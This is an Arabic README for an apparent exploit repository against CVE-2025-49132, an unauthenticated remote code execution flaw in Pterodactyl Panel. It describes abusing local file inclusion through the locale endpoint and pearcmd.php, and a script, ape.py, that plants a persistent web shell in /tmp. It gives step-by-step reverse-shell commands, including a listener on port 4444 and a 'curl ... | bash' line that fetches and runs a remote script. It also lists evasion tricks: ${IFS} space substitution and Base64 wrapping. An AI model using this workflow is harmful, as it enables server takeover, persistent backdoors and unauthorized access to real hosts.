
استغلال آلي لـ CVE-2025-49132، وهو تنفيذ رمز عن بُعد غير مصادق عليه وحرج في Pterodactyl Panel. يستفيد من LFI عبر نقطة نهاية locale لنشر قذائف ويب دائمة وتحقيق وصول قشرة عكسية.
يحتوي هذا المستودع على استغلال متخصص لثغرة CVE-2025-49132، وهي ثغرة حرجة تسمح بتنفيذ التعليمات البرمجية عن بُعد (RCE) دون مصادقة في لوحة Pterodactyl (قبل الإصدار v1.11.11).
توجد الثغرة في نقطة النهاية /locales/locale.json. من خلال التلاعب بمعاملات الاستعلام locale و namespace، يمكن للمهاجم استغلال تضمين الملفات المحلي (LFI) للتفاعل مع pearcmd.php. يسمح ذلك بإنشاء ملفات عشوائية وتنفيذ الأوامر، مما يؤدي إلى اختراق كامل للنظام.
يقوم سكربت ape.py بأتمتة الخطوات التالية:
اكتشاف PEAR: يقوم بفحص بنية الدلائل لتحديد موقع تثبيت PEAR على الهدف.
إنشاء باب خلفي: يستخدم config-create من PEAR لكتابة شيل ويب دائم إلى /tmp/shell.php.
لتحقيق اتصال عكسي ناجح على الهدف، اتبع سير العمل التالي:
penelope -p 4444
خادم الاستضافة: إذا كنت تستخدم سكربت شيل مخصصًا، فاستضفه عبر Python:
python3 -m http.server 8080python3 ape.py --host xxx.xxx.xxx --interactive
shell> curl http://<YOUR_IP>:8080/shell.sh | bash
تجاوز المسافات: يستخدم تلقائيًا ${IFS} لضمان بقاء الحمولات سليمة أثناء تحليل عنوان URL.
غلاف Base64: يغلّف أوامر الشيل العكسي في Base64 لمنع تشوه الأحرف بواسطة خادم Nginx/الويب الخاص بالهدف.
معالجة المهلة: مصمم لاكتشاف متى يتم الاتصال بالشيل العكسي بنجاح حتى لو علق طلب الويب.